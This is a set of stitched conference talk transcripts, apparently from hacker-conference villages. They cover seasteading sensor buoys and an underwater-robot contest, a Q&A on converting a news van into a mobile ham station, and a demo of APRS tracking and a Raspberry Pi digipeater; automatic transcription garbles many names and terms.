luck. All right. Yeah, okay. So then I think the, the simplest and probably the best thing to start with would be the stationary that's going to stay in one place. So that is for that is that technology is really critical for us because we would really like to know what the conditions are in our area and be able to put those stations in remote areas and collect data before we even decide to ever go there. So we can actually be collecting data and see what the conditions are a year round. And if it's a hospitable place to put a CSTED. So it'll just be there collecting data maybe for a year before we would actually move there. Like would collect wave height data. So we'd actually be able to collect the data on whether the boy was going up and down what the rate of going up and down is. So we'll be able to see what kind of waves we have if we have really crazy out of control waves or if we have slow and steady, very calm that you'd actually want to live in because living in big waves is not necessarily fun to do. Our homes are actually we've engineered the home so they actually float above the water. So we're suspended on a pole that is about two and a half meters above the wave area. So that makes us very comfortable, but still when it's really, really, when the conditions are really wavy, then it's still not nice to live in. So being able to collect all that data in advance is really good. And we also really want to have clear data that can show the current state of the environment before we put a CSTED in that area. Because we don't want to three years from now cause any kind of damage to the local environment, marine environment. We want to make sure that we're our homes were actually engineering them so that they can be eco restorative and not damaging. So for that, the more clear data we get as a reference, then that that really helps us out a lot. Grant, I have a question from the audience, but I wanted to do just a follow on question to what you're talking about, which is, is there a specific sort of climate to logical limit to where you're C setting what I mean is there. You were talking about Thailand, which is a pretty tremendous space, but are there places where you're like this is just a terrible idea or the technology is not there yet. Is there an optimal zone for C setting. Yes, there is. We are in Panama right now and that is pretty much the optimal location to start. Because Panama is outside of the hurricane zone. There's a, I guess, 700 or 800 kilometer band around the center of the earth around the equator, where you don't have hurricanes, just because the way the Coriolis effect of the earth works, if you just can't get hurricanes in that area. So that's an ideal place to start because we don't have to worry about moving our home every year when the hurricane season starts again. So that's an ideal area. Obviously, a lot of people like being in warm tropical, beautiful areas and Panama has a lot of beautiful untouched green. Jungly areas that are beautiful and having your C step close to land. So you have beautiful view of the mountains and the greenery is. It's really nice. So that kind of environment is really ideal versus putting it in the North Sea in the Arctic somewhere or someplace really cold with 100 foot waves. That's definitely someplace you don't want to be. We can engineer them for. Different conditions like our, our base of our C step is actually built in the same base as a, like an oil rig. So we have these deep spars, which are poles that go deep into the water that have that create the buoyancy and then you have very heavy weight far below them below the spar. And that gives you a lot of stability. So we have buoyancy as well stability and then we can just scale that up to something the size of an oil rig, which can be in pretty nasty conditions, but we, it's probably someplace you don't want to live. Okay, so the question that came in is, is that do we see. Are we aware of rovers or bots that use VR virtual reality vision navigation or virtual reality vision for for operators using advantage in that or more traditional methods of computer vision more useful. So this is a question about how the bot understands the environment that it's in grant you have any early thoughts on that and then I will I will dial through my mental Rolodex and try and remember a time for the Navy go ahead. I think that would be the ideal condition for us to have as far as giving people a really good idea of what living on the water can be like, but actually like being able to have them either remotely or on site where they can actually put on a headset and like swim through the water and see underneath the water and see what's going on. If we could give that kind of experience to people either remotely or on site that they could actually experience it in that way that would give an dimension that people haven't really had before, and to be super interactive and be able to explore the area and so from a tourist kind of point of view or to get people kind of introduced to this whole new way of living and being which is totally for under most people living on the ocean that's, that's a big step for most people but if you can kind of have those baby steps to give them a vision of some pretty incredible sites that you wouldn't normally see that would be really, really fantastic. Yeah, so Grant I agree like I think I think really is particularly for tourism. Getting people to sort of buy in and understand what it's like to be down there. I mean there's something. We are human right there's something compelling we are sense animals and if you can get more sense that a human can understand down there that's that is super helpful I will admit that to my knowledge Navy who is not particularly interested in human sense but is more interested in you know sort of targeting fixing tracking that their, their challenge set is already super hard. So for instance, so if you're if you're a big Navy asset and somebody's fired something at you from far far away under the water. Like, your, your biggest concern is by the time you figured out where it is. If it has any self guiding capabilities, then you're going to try and counterfeit that gets military really fast. You're going to try and counterfire but you have to try and guess where it's going to be. And so that's that's so a lot of that stuff isn't really VR relevant Navy is really thinking about how do I stop someone from hitting me really 99% of Navy's how do I avoid getting struck by something. And so, you know so but I love I love the question about VR because I think it makes me think that we're not thinking broadly enough in the Navy about the way to onboard these new capabilities grant I have another question for you if you don't mind. Right, so it says, do the homes have any built in capability to collect data from the environment around them so like not just sort of like something you, but like in and of itself built into the infrastructure of the of the sea said so. Yes, we're building as many sensors as we can into homes to make them really, we want to make them smartest home on the sea. Well, they will be because there's not a lot of smart, really smart homes on the sea because we're the only ones building. So, first level, we have a weather sensor that's on the roof that detects lightning strikes and detects UV, the wind direction and a whole host of data humidity temperature and parameter pressure and so there's there's a long list of things that it collects right from there. So, we will have sensors inside that will detect movement, because we want to be able to chart what what the movements like if we are getting, and say if you're if you're away from your home for a while and then your home starts moving around for some reason, we would like to be able to give you an alert to make a big storm coming and you can call your neighbor and ask him to close the doors or something or close the windows or, you know, whatever, or you can just do it remotely from your from your handheld from your phone. So, we're building a lot of sensors like that. I mean, there's, you know, there's going to be standard sensors, but environmental sensors will have as many as we can we would like to be able to detect the temperature of the water at different levels, going down. We would like to be able to turn each home basically into research station and document the environment the green environment ran, because we're not we're not just trying to make homes on the water we're trying to make homes that are a positive contribution to the environment. So, part of doing that is to be able to assess what the environment is like, and if we're improving it or not improving it so we want to measure the turbidity the alkalinity the pH and same thing. And other factors so we can we can see if there's more life after they've our homes have been in the water for for a couple years or a couple months or whatever when we had our home in Thailand after only two months of being in the water. It went from being like a desert basically under water which most of the water, most of the ocean is a desert. And when you get far away from the coast, and we're 13 miles away from the coast so in that case, after two months, we went from having nothing around to having thousands and thousands of fish. So, we like having that kind of success story and we'd like to be able to reproduce that so we're going to try to use sensors to collect as much data as you can. I mean, so the I so sorry, I don't want to make this super military but please forgive me grant, it's, you know, I have to translate for the war types of us out here. So you're talking about an ISR environment and we're all that data is going and I wonder what so from a person who doesn't want everything to be about the military, but knows. Once the military gets a hold of something, they're going to make it about the military. It's just it's it's a it's a it's an interesting side effect of that mindset. Do you have any security concerns about the data that you're collecting being used against the countries where your homesteads are. That's terrible. I'm super sorry I had to ask it I'm sorry. Yeah, no security. Come on. Yeah. Well, that's why I already spoke with Brian a couple, maybe a week ago, go about having all of our systems have security threat analysis done on on even each of our sensors. All the hardware we're going to be using all of our systems, and then just have people try to hack it and see what they can come up with and try to patch as many of those things as possible. So we're going to what we want to do is to be able to have all this data and you can you can get your cstead and not put all the stuff in it but I would like to be able to collect data. And we can, as if you're an owner of the cstead you can have the option of having that data where that's available to you and only you and that's encrypted. And you own you're the only one that has access to it and we'll probably put it on a blockchain or whatever makes sense to. And then you can release the data if you want to share that with anyone else. If you want to share it with, like you can share it with just yourself you can share it publicly or you could share it just with like a management company that can see. Okay, that the sensor at your house is showing that your water levels are getting really low and you need to replace your something on your on your home, because it's at a critical level, or if your battery levels too low and your, your power systems are going to continue and you're away then then we can come and help you know take care of that our management company can come in and take care of that so so there has to be I think different permission levels for what where your data is going to go and there has to be really good testing to make sure hackers have a hard time getting in as hard as possible. Yeah, no that's I mean it's, it's interesting as we live in an era where seemingly innocuous information seemingly right I mean this is the big debate not to not to go super meta. But this is the big debate about like what's the harm in tick tock right like what is the harm in. We're not just a company, but we can also say a country right, both can can be equally evil. What is the harm in all of this seemingly innocuous data being built up and so not to, and honestly, everybody should tune in tomorrow for for grants specifically but just to sort of open, open the door a little bit. What kinds of, what kinds of concerns do you have about big data that like that you're collecting like what have you have you thought through what someone might use that stuff for I'm an optimist so I always look at as much I always look towards the positive so I'm looking at what amazing things we can do because I, I genuinely I'm not doing this because I need to do another project. I'm not doing this because I love doing this and I want to do something that I think we can. I think when we build, when we build homes on land we kind of destroy the land and you know clear cut the forest and that's not, you know, it's not a good, we're not being a good citizen of the planet. That's what I saw last year in Thailand with so much life. All of a sudden just appearing after just two months that gives us an opportunity to actually be a good citizen of the planet. So I'd like to, I see this as I always look at the ways of making an impact to the situation and I think we can use data to help improve the restoration of coral reefs in the world. And so I'm going to, I'm going to plus up because there's a question that's come through a little bit further about the telemetry data that you could collect passively from these people and I'm going to ask it specifically because folks are asking and then I realized we're going to run out of time here in about 14 minutes but and you and I will, we'll again talk through and invite people to join us in next year's bot challenge. But the question, again, is are you guys thinking about this from an educational standpoint like this, the data you're collecting doesn't I mean it you guys are looking to benefit the environment directly. But I mean, is there like, is there some sort of partnership or subsidies like educational institutes like are you trying to partner to try in and and make all of this telemetry have effects beyond just the sea setting element. So two weeks ago we started reaching out to people that we could partner with. I basically have 150 projects, like huge projects going on simultaneously so, and it's all filtering through me at the moment. That's how we know you're a hacker. Go ahead. So I'm trying to bring more people on board to help distribute some of the research because there's just so much I can do. But I would. Yeah, there's there's there's a lot filtering through me right now so we need to get a better handle on that and then I think we'll be in a pretty good position to make. Do some really good things with the data. So, I guess, partners. There's a lot of people we could partner with and that's just another project to find the right partners and I haven't started to we have started to look. We started to reach out. Find the right people that would like to partner with us and we're open to, if anyone has any suggestions. I'm, I'm all yours. Just send it in the chat or on the C setting channel. Cool. Thank you so much. All right, so we're going to round us out. Actually strike pot is a question for us that I think we should probably address, or at least take seriously as we build out our guidelines. He wants to know to what degree. Our cuts products allowed so so consumer off the shelf products in building either your floater class or my swimmer class. Can we can we buy, you know, some local bot for 300 bucks and then just repurpose it and does that stay within our open source guidelines requirement. And I realize that we're asking on the fly because I know you and I were going to try and sit down together and noodle out exactly what kinds of limitations we want to slap on these folks for next year. But, but do you want to do you want to take a stab at cuts products. And, and then I'll, and then I'll, I'll give my preliminary thoughts on that. Yeah, I really want to have this done in the open source. And I guess if that interferes with that, then that's like kind of a kind of kills it. So if we have, if you have, if you're buying something off the shelf and then modifying everything on top of that, I don't think enough that that would give enough of open source component. Maybe if there's a consumer part that I don't know is maybe like, I don't know, an off the shelf robot arm or something that could be plugged into the whole system. And that wasn't an essential part of it then, then I guess that could be acceptable but if it's, if you're just modifying it off the shelf, aquatic drone and I don't, I don't think that would be like I think the guts the core guts of it are, are commercial then and closed source and I think that would be killer. I think, I think I agree again we're doing this on the fly as we dream this up. And I'm in before we wrap out I want I'm going to have grant remind us of what he thinks the the earliest and early speculation, what the floater class requirements are going to be and I know he's been working up a sheet on that. I'm inclined to say that if you want to use a COTS product for pricing components right so we have $1000 limit on the on the swimmer class. If you want to use a COTS product, you, you would at a minimum need to show me that it has been reverse engineered and that you are really economizing on costs, or, you know, private production of a servo, but, but you would at least have to prove to me that like no look it's been reverse engineered and those reversed engineered components are available open source, and so a person can sit down and say I am just cutting to the chase. And I think that's fair but you have to show me that it was that it was the case and I think that again, so for the, for the, for the swimmer class we're going to have some gates that people are going to have to go through throughout the year and make sure that by the time we get to the, to the pool in Las Vegas, we have got some, you know, no shit, seriously interesting bots, they might be dumb, right, they might be running into the wall repeatedly but then we've got some some bots that, you know, at a minimum like our full maker gear thought through and are going to behave in interesting ways that we had not anticipated. In part of the fun of the hacker space is just giving it a shot and seeing all the variation that emerges is one of the most beautiful parts of this community is that everybody's teaching us different ways to go at a question. So we're not trying to close that down. In fact, I'm trying to open it up. Which is why we don't want this to be about cuts right we don't want this to be about we want we want to want you to show us all the ways in which you're coming at, I don't want you to tether for power in a curiously interesting way. There's a lot of there's a lot of urine in Vegas pools maybe you can use that as a power source hard to say, but but you know sort of speculate and then think your way through it. If we have any luck. We will be able to secure a Las Vegas pool to do this in. And so, you know, really just trying to get a tan. And so that you don't die under the Vegas sun. And okay, so grant, I want you as we ramp out of the eight minutes left. Give me again just to recap for the folks. Give me the primary challenges the floater class are going to come up against one of the primary to be like this. I think this is really the issue. The big piece of it would be to be able to collect data and store it but also send it and sending a distance on the water could be could be a little bit tricky could be a little bit challenging. Because we may not have a station nearby where we can just we're just sitting there waiting for the data to come in. But to be useful, we have to be able to collect it. And some of these could be fairly remote in areas that are hard to get to so it would be very advantageous to have as long as the transmission period as possible I don't know how I will test that in Vegas. Good luck. Yeah, so maybe we'll have a team three miles away and seeing they can pick up the sensor data from the pool. That could that could possibly work. So that's going to be really important. Being able to check wave height is really important. Interesting. Yes, I'm sorry I haven't been thinking about surface vehicles. Oh, you're totally right. Okay, go on. Sorry. It didn't mean to drop. All right, go ahead. We would like to be able to know how how big the waves are what what the the period between the waves is. So, all that data is really useful. We'd like to find out if there's a way to find out the direction of the waves from sensors. And I was trying to figure out myself how how I would do that and I haven't put too much thought into it but I haven't come up with the solution on how to do that. Just with with sensors unless we brought AI or machine learning and had cameras to be able to do. I have so many ideas right now go on. Sorry. You know, you know, sorry, go ahead. Then. So, just standard. We can collect standard weather data as well. Probably we'd want to know lightning data as well if there's a lot of lightning strikes in that area. We might not love to be in that area if there's a lot of lightning and coming down in that area. So, that's a condition. You know, so we're going to see which are the most important items for us to have on this list as a final specification. Solar powered would be nice so they can last as long as possible and we don't have to go out and change the batteries every every week. If it could be continually charged that would be that would be ideal. So those are, I think some of the more important things. And of course, collecting any kind of water data we can like pH or salinity temperature. To busy cameras under the water that can identify fish with machine learning would be really cool as well. Oh, interesting. Wow. So that's so honestly that's, that's going to be VR right that is going to be I mean I don't, I don't think anyone's got it. I don't think anyone's got a massive database of fish signatures. I mean, maybe tuna. If you're lucky. Gosh, I don't yeah that's that's really interesting I hadn't thought about that before but yeah what does the fish look like and how is it not a plastic bag and interesting interesting okay. All right. So from a naval perspective, and you folks know me like I don't have to talk. I will talk from this perspective because I think, because I think it's different because I think it's complete contrast into what into what grants talking about and I love what I think it's fascinating it's amazing I think it's useful for the future. But in contrast right like what are some other kinds of challenges so grants talking about survival of a floater he's talking about persistence he's talking about integrity of the data long enough to you can fetch it back and I think that all those things also matter. When it comes to things like how do how does a navy project power or at least protect vessels that are going along in the sea like one of the issues of play for navy is for all navies not just the US Navy is how do we protect where so much of the world's commerce comes from so for folks who don't know, right all the items, probably the vast majority items that you have running around in your house, come to you via a boat, they come by a ship they float on the surface. And one of the things that navies and coast guards are required to do is ensure the safe passage of these objects right and if we're all impatient Amazon consumers, then we want it now. And so the question is, you know, how do you prevent those kinds of delays how do you ensure freedom of navigation freedom of the sea so it's a navy question for navy. These, the, the, the biggest concerns are about following things. The biggest concerns for the navy are which of these we call them white, white, we call those white ships white ships being ships that aren't aren't out there with a military capacity they're there to, you know, bring tourists around or they're there to move cargo from China to the US right this is white. So how do you tell the difference between white and other forces, how do you then once you've identified these other elements that could be doing terrible things or might be trying to terrible things. And so you follow them in a meaningful way without having to send out a ship and and literally follow it right. And so really the question for the floaters flimmer class for us is about locating something almost passively right from an IR ISR perspective almost passively, just just being able to sort of map who's who in the zoo and where are you heading this week. And honestly so Gary Kessler is going to talk to you folks actually in the next hour I think about hacking a IS and a IS is the system by which all ships voluntarily share their tracking data as they transit the seas. And there's a real reason to be concerned about that system. And so, so we'll worry about that those securities that security in the next session. Anyway, so we're going to say goodbye because I think we're down our last minute. I love you all. Talk to you all soon and I miss. Go ahead, Grant say goodbye. Hi everyone. I look forward to seeing you tomorrow on my talk. I think it's at 10 o'clock in the morning. Thanks everybody. Bye.
|
40,000 Leagues UUV Death Match
|
10.5446/51645 (DOI)
|
Okay, it's time for the Q&A. Let's get some questions up there. I got Pete here in Discord, so let's give a hand to Pete. Get some questions going. Pete, do you got your webcam on there? Yeah, I'm getting a repeat of your voice about 3-4 seconds. Are you watching the stream live in the background? Yes, I should not. Correct, go ahead and mute that. Okie dokie. Ok, now that we got that, it looks like we got a question. What measurements or experiments were done to evaluate the RF hash of the boost converter? It wasn't very sophisticated when I first got it, which is no longer, by the way, no longer obtainable at that amperage. It's a shame the ham hoop built that died, but anyway, I just had it connected to a battery in my basement, and I did a before and after. So I had the radio running with it and without it before I started mounting it. That's a great question because it brings up a larger point that most regulators, power supplies, anything that has to do with changing voltage, they're almost all a terrible problem with RF hash. You have to assume that components like that are bad until proven good. So great question, a great thing to watch out for whenever you're doing anything with power supplies or changing voltages. Very nice. We got another question from the Twitch here. Let's see. ArmoredDKrab says, thanks so much for sharing. Curious if you worry about security of the van, what was the microwave rack for? Sounds like two different questions. So the security of the van, I assume you mean physical security. I am a little worried about it. I should have better protection for it. Now when it's stored long term, it's in a garage with cars that are much more expensive than this van is for car collectors. So I've got good security when it's stored, but yeah, I'm a little worried about it when it's parked at a hotel or even at home. I don't have a good answer for that and I should have a better answer. The microwave rack, that was just by chance that a guy in our club was retired from roving himself and sold me his entire collection of microwave van. So I wanted to get into microwaves at some point and I just took that opportunity, which happens a lot in radio. You have equipment available now that you think you might use in the future and it's at a great price and hey, get it now. You might save hundreds or in this case thousands of dollars in the future. I mean, that rack that I showed with the microwave capabilities, if I got new equipment there, you're looking at at least $15,000 and I didn't pay anything like that. I didn't pay five figures for that equipment. So it's not on the air yet, but it's there and ready to go when I get the lower bands ready. Very good. We got another question from Deadpixel in Discord. How do you deal with your van's total payload weight? Yeah, it must be heavy. Are you over with all that equipment? No, it's the total payload rate. There's a lot of special things about this van to package those with things like TV bands. They also have a lot in common with ambulances. Ambulances have a lot of heavy equipment with AC requirements. So I don't know what the number is. I think it's well over 9,000 pounds. And I assume that even with my heavy batteries, that the whole van weighs a lot less than it did when it was used in the TV van. Although I have to admit that engineering-wise, I didn't compare the weights or even measure how heavy it was. I made a guess when I registered the van and I made a guess that's 6,000 pounds. I think it's below that though. So good question, but I don't have a really good, satisfying answer. Yeah, it's definitely got to be a beefy van, right? We got another question in Discord. Testing2 asks, whether seals and grommets and water intrusion on an old van was the rubber all crumbling? How much of that did you need to refurbish to make the old ship sea-worthy again? No, I didn't have to replace anything yet. There was some water infiltration through the connection on the roof to the satellite antenna. Real early in the presentation, I showed my buddy lifting that satellite antenna off. So that had some water infiltration on it. I put a 4-3.5-inch cover on it and it hadn't been a problem since then. As far as the seals for other cables or even the doors, the only moderate problem was some of the seals for the doors were coming off. But they weren't dried out, so I didn't have a real problem there. Now, I haven't done a lot of cables that run to the outside, especially through the roof, so that is a concern when I do start wiring. That's one thing I should say that I'm not using a lot of... I got a screwdriver antenna on the back for HF, but I haven't done a lot of work with getting the VHF antennas out. That's obviously involved a lot more cables and ones that run through the roof instead of the floor, so I do it. I'm not going to watch out for that. Very good. Another question from Twitch here. CalvinLuck asks, those are such densely packed racks. Are you able to get access to most of the connections without fully disassembling it? Yeah, luckily... I'm going to take a step back. Part of what I wanted to do was make a little video tour of the van, but I ran out of time with the tropical storm that ran up the east coast. He said, Mike, excuse... it's a good excuse. It's true. Anyway, it's really good accessibility to the back of the racks. The first three racks that are together, there's a back door where you can get access to the AC panel that is played and the box for the generator, and there's like a storage area back there. It's pretty good accessibility. I think the only problem I have in the driver side and rack number three, it's hard to get access to the screws to put the rack equipment in that I mount from the rear. But other than that, it's pretty accessible. Now, obviously, if there's interior connections that I have to fix, the racks have to come out, or maybe at least the racks on top have to come out. Pretty good accessibility on both the front and the back. That's good. Nothing like taking a full day to take stuff apart just because you forgot something. Oh, yeah. Okay, we got another question in Discord from Bunzel. In addition to the van you showed us, or the van, do you have anything else for airflow or cooling to prevent hardware from overheating? No, and I do worry about that because it gets pretty darn hot in the van. It gets less hot than it did in my minivan because there's less glass to let sunlight through. I do have one other fan that I put in the back, so I opened the back door when it's particularly hot. I opened the back door and I have a van fan that's powered with 12 volts to get a little bit of airflow in. I'm kind of surprised at how hot it's been that none of the equipment has failed so far just because of heat. I don't know what to say. They work better than I would have expected, that I have any right to expect. There are physical opportunities in the back, I would suppose, to get even more fans going. But so far it has been an issue and I've activated on HF at least up to like a air temperature of 95 degrees outside. So far so good. That's a great point though, great question. And I don't know if you remember at the beginning of the presentation, I emphasized that I can't have the van engine on. I can't have the AC system on because of RF hash. So while I'm operating I can't have any air conditioning on as much as I would like to. Oh wow, that's a bummer. Yeah, especially if you came to DEF CON with that thing, it would definitely be a sweaty situation. Someone's asking, are you going to do a video tour of the van? I want to do this time, but ran out of time. It would be especially nice I think when I get antennas on it though, because it's kind of limited to just the interior. It's not too much to see. It would be nice to see it in operation I suppose. I'd like to make a video when it's more exciting, when I can show the pneumatic mass in operation and the rotator rotating. I hope I'll do that someday. Very good. Do we have any other questions on Twitch or Discord for Pete here? K-O-P-A-K on his ultimate van life van conversion. I'm not seeing anything yet. We'll give him just a few more seconds to throw a question out. Okay, looks like that's it for the Q&A. Well thanks Pete for the presentation. Maybe we'll see some demos or some other content maybe next year at DEF CON. Oh, that would be great. I hope we get him an opportunity to get together live. Thanks for being a great host and holding my hand through this 62 year old getting used to Discord and Twitch and all the other stuff at one time was kind of overwhelming. You guys did a great job. Thank you. Thank you and we'll see everybody for the next presentation. Next up we have K8AMH with the National Traffic System and Radiograms. That will be coming up in about 20 minutes. We'll get going on that and we'll see you guys shortly. Thanks Pete. You're welcome. Thanks for watching.
|
Come see how Pete (K0BAK) is converting an old TV news station van, the kind used to produce and relay live TV reporting, into a mobile ham radio station!
|
10.5446/51646 (DOI)
|
ooft Okay, it's time for the demo KG700W here with the Ham Radio Village. Let's get going on APRS and a quick walk around on usage of every aspect. So let's get going. So APRS, the automatic packet reporting system is based on the AX25 protocol from the 1980s. Pretty old. Another slang term for this protocol you may have heard is packet. It is basically another use of this. We're going to dive into more of the APRS route of this and some of the basic usage. So we'll go from the APRS website, how to see APRS. You won't need a license to do this. We are going to go to the end user, someone transmitting APRS from a handheld mobile. And we'll also take a look at a DigiPeter, final parts of the APRS network that get your message to other DigiPeters or to an iGate out on the internet to be posted online. So let's first take a look at where I go. This is where you are going to see APRS traffic live for your area. There's two main websites. Let's dive into the first one. So this is APRS.FI. For those of you who haven't been here, it's a great resource to see live APRS traffic. We'll zoom out here. Let's go to the Las Vegas area, DEF CON central here and see what's going on. So when you come to the site, it'll first probably throw you in somewhere in Finland. You'll have to navigate to where you want to go. The right hand side will let you select how much traffic you want to see. You want to see traffic for the last hour. You want to see the last traffic for the last day there. So plenty of information to see. We're mainly going to focus on the map here though. So here's the Vegas metro area. It's all these icons about. We got looks like an RV icon down here in the middle. Driving around is RV broadcasting APRS packets. We have weather stations. We have other objects on the map such as D star repeaters and things like that. Like N7ARR over here. Time is not working great on the video. We'll get some more details later there. And then here we are outside of Vegas. My favorite mountain, Mount Potosie. This is home to the Vegas Digi Peter and IGate. So it's definitely really cool to see all this on a map. And again, you don't have to be licensed to view this map. It's definitely a great resource. So this is what I go to when I am looking for who's coming through my area. What are they doing? Are they listening on a frequency that I might want to talk to them on? Mainly for vehicles here. But if we pan out into the desert, a lot of the times you'll see planes. You'll also see weather balloons and other things like that going across the map. So definitely keep an eye out for those. Let's for a chance see if there's any weather balloons or anything going across right now. I do not see anything up. They typically do launch every couple of weekends though out here in the West Desert. So definitely something to keep an eye out on. Okay, let's look into detail on some traffic. What are these users? What are these objects sending to the APRS network? So here's a car out in the West Desert going just past, let's see, just past the test site over there. We have K6BFA and he is cruising along the highway. We can see the timestamp of the data. We can see his heading, his speed, his altitude. Any GPS metadata that that radio is capable of putting out. He has a little message, mic E and route. And he is repeated by the Vegas map potency repeater. If we zoom out here, we can kind of visualize how his packets are getting to the internet map here. Oh, come on. There's no one in here. So if you hover over an object. Oh, come on. It is not wanting to work for me here. There we go. Let's, let's get out here. Okay. See, so I'm hovering over his icon there. You can see it's going through the Vegas DigiPeter up on Mount Potasy down in the bottom middle there. And looks like it's going to another eye gate. Maybe the eye gate there. Potasy's down. So these eye gates that it's going to transmit to can be hundreds of miles away. Looks like that's down in the San Bernardino Valley. So that's a pretty crazy run for some APRS traffic. When you get to things like weather balloons, you'll have hundreds of stations picking those up directly. But the first station that picks it up is the one that gets to report it to the system. So another really cool map to hit up when you're looking for some APRS action is APRS Direct. It's more of a high end web 2.0 type interface. It's got live updates. The icons will update live. You'll be able to see pings on the map when things happen as they're happening. So sometimes it's a little easier to see things here. This is kind of a newcomer to APRS maps, which is great. Let me throw a link there in chat for you guys when I'm going through. So this map, very similar to the last map, it's just a little more interactive. We got same amount of data. You can see hops that these packets are going through. You can click on an object. There's our same guy we're going to be picking on here, K6VFA. He is cruising along. There's his same path. He's being reported through Vegas at his timestamp. Same information bearing heading, things like that. So, this is just really cool, very awesome way to see what's going on with the APRS network. Now how do you get traffic to the APS network? So this traffic, including weather stations, handheld radios, mobile radios that are APRS capable or anything else you can think of, they all require a modem enabled device or just a fully integrated APRS device to get out there. One of the easiest ways to get into it is with a integrated radio. So let's look at my handy Kenwood THD72. It's a great, here we go. It's a great little radio, not really little. It's a little bulky. It needs to go on a little diet there, but it's an all-in-one solution to get your packets out to the APRS network. This particular handheld can be used with the built-in GPS with the antenna on the top there. It can also be connected with a cable to a weather station or other KISS enabled device. So it's very cool, very fun to hear APRS going on. So it looks like someone's keyed up on APRS, but sounds like voice data. Someone's got a hot mic. So the APRS frequency you're going to want to dial to on your all-in-one inclusive device is 144-390 in North America. I haven't gone through APRS on any other country, so I'm not 100% sure if they're throwing other frequencies around for other regions, but definitely 144.390 for North America. Now tuning into this frequency, you're going to hear the raw APRS packets. They are going to sound very much like an old classic modem. I don't know if it sounds like I'm getting some interference or someone's hot mic and 390 for me, so I'm not going to be able to decode anything. Yep, just static. So I'm thinking I got some interference. But with this handheld, I can beacon directly just by hitting beacon here, and it will manually beacon my location based on the GPS to the APRS network. I'm inside, so my GPS likely is not going to get my coordinates and without proper coordinates. I don't think it will show up, but just in case. Let's go look for KG7OOW. I am not showing up, so there's definitely some traffic around though. So with a handheld like this, we get to configure it. So out of the box, you need to configure your handheld with typically just your call sign. So I just go to the menu, hit up APRS, and it typically just needs your call sign. So you throw your call sign in there. Oh, there we go. You'll typically just throw your call sign in, maybe a SSID at the end. See that dash 9 at the tail in there. You can do that if you have multiple radios, or if you want to have a specific ID for that radio. And then you'll basically just need to tell it how to beacon. So on this handy can, we got, there we go. Where is it going? You can set your position manually and you have beacon. So this is how it's going to beacon your information. Typically on a handheld like this, you can set it to beacon on an interval, or you can have it beacon using what's called smart beaconing. And that will automatically beacon you based on your speed and your heading. So if you take a turn, you change speeds, it's going to broadcast your APRS data accordingly. So it's really cool. These little handhelds are great, but definitely on the pricey end. So this Kenwood THD72, had to look that up there, is, I think I got this around 500 bucks. So it's definitely pricey. It's definitely capable, but there's other options out there. So let me slide this over and give kind of a cheaper option. So one other cool option is a standalone unit. I got this handy AVR T5 from Amazing Alley Express. These little things, all inclusive. It's only one watt of power, but you'd be surprised how far you can get out with APRS on one watt of power. This handheld, this Kenwood, I've gone probably 150 miles, pure line of sight. So this was definitely to a mountaintop DigiPeter. I was out in the Nevada desert and was able to get to DigiPeter in central Utah. So that was really cool. But this little one watt Chinese, kind of hard to configure radio is actually pretty handy. I got hams here that will either throw, just leave it alone, or throw a linear amp on it and get a little bit more distance out of it. But definitely something you can throw into your backpack hiking on your bike in your pocket. So it's very cool, very, very nice little slim device here. Another option when you're picking end user APRS equipment is definitely an app called APRS droid for Android. So APRS droid, I haven't gotten to work on the latest version of Android, but most ham software, you're going to expect that. You can get little, this is called a microlinked TNC. And it's just a little 3D printed case with basically a Archimeno Nano inside. And it connects via little three and a half millimeter jack there to an adapter cable to your radio of choice. So it can be paired with a bauphin. It can be paired with another radio, anything you want. And it connects via Bluetooth to your phone. So your phone will be running the APRS droid app and very much like the handheld can would you get to put in your call sign. You can put in icons that you want to put and any messages that you want to put as your beacon. Another really cool feature about APRS is not just GPS location, but messaging. So on my little Kenwood handheld here, I can send messages by using the keypad. Pretty old school kind of like how you used to have to text back in the day. The touchpad there. But the advantage of this cool little microlinked TNC with your APRS droid enabled phone, you can just use your Android phone type the message and get it sent. So it's much easier to use this paired with a phone and a radio than to just use the radio if you're going to go the messaging route. So definitely something really cool. There's just I always look on Aliexpress or Amazon for new APRS devices and there's just every once in a while they'll come out with something really cool. So that gets us around the end user devices, handhelds, other dedicated units from China that may or may not have reporting capabilities for the government there to mobile link TNCs with your Android phone, but there's another piece to this puzzle and that's the stations that actually get that data, the packets that these devices put out to other DigiPeters and eventually to the internet. And that's where a DigiPeter comes in. So this is a basic DigiPeter setup. I got these all over the state here in Utah and we have definitely increased the APRS coverage in my region and hoping to expand into other parts of Utah. So this whole setup consists of a two meter radio. This particular radio is just one I got off a surplus. It's an EF Johnson RS5300 here and all you need is a two meter radio that has connections on it to for push to talk and for the audio mic and speaker. These radios you see out there will have this either through the front port jack here or with a dongle or connection in the back. This one just happens to be done with a DB 15 connector on the back DB9 and this just plugs in and gives me the breakout for audio push to talk and that's all we need on the radio side. So a two meter radio. It can also be a handheld. I've seen people use bow things for this. So definitely something that can be done a little cheaper. But this is nicer plus radio. I got it for about 35, 40 bucks. So not too bad, too shabby. So this radio needs to hook up to a device that can decode these APRS packets. To do this decode, I interface my Raspberry Pi with a Easy Digi. These are available on eBay and it comes in a little kit. You have to solder it together. Just a little more part of the adventure. All you really have to do is solder two leads for the audio and the connections to your radio for push to talk, things like that. So in this particular setup, I am using the GPIO for push to talk. You can also just use Vox if you're using like a handheld radio or a bow thing. This particular two meter mobile radio is not capable of Vox. So I definitely have to manually trigger push to talk and that's where GPIO on the Raspberry Pi comes in. So radio goes to your Easy Digi. The Easy Digi is basically just an isolation. You actually don't need the Easy Digi. You can wire things directly. It's just safer. You're not going to ruin your Pi with its low GPIO voltage and you're not going to screw up your radio and you'll also get cleaner audio. So definitely go with the Easy Digi. The Raspberry Pi, it's fitted since it only has a speaker output. I wish they made this a four pole connector with a mic input but hey, you can always go to another Pi variant like the Banana Cream Pi or something for that. I just fit my $35 Raspberry Pi with a $4 or $5 USB audio card. So you can grab these on Amazon. I'll put a link in a little write up when we post this video. But you just take your microphone, plug it in and your speaker for your radio. Plug it in there, get it in the Pi and you're good to go on the hardware side, I guess other than the GPIO. So GPIO is another step in the setup. The GPIO portion as well as the software portion is covered in the documentation of the software I use and we'll get into that right now. Let's go to the good old browser view here. So my choice of APRS software for my Raspberry Pi or any other system is called DireWolf. So we'll hit up DireWolf. I'm just going to use Google here. They have a great set of documentation on GitHub. You can go through any doc on here but the main thing you need to do is go for the documentation on your system. So they have documentation for Linux, they have documentation for Windows and they have specific documentation for the Raspberry Pi. So let me look here. So yeah, I'm just going to scroll down here just to make sure I'm speaking the truth here. But there we go. Raspberry Pi for ham radio. So DireWolf is going to be built on top of your Raspberry Pi so you need to install a distro. I just use Raspbian for my Raspberry Pi. Get that installed on your 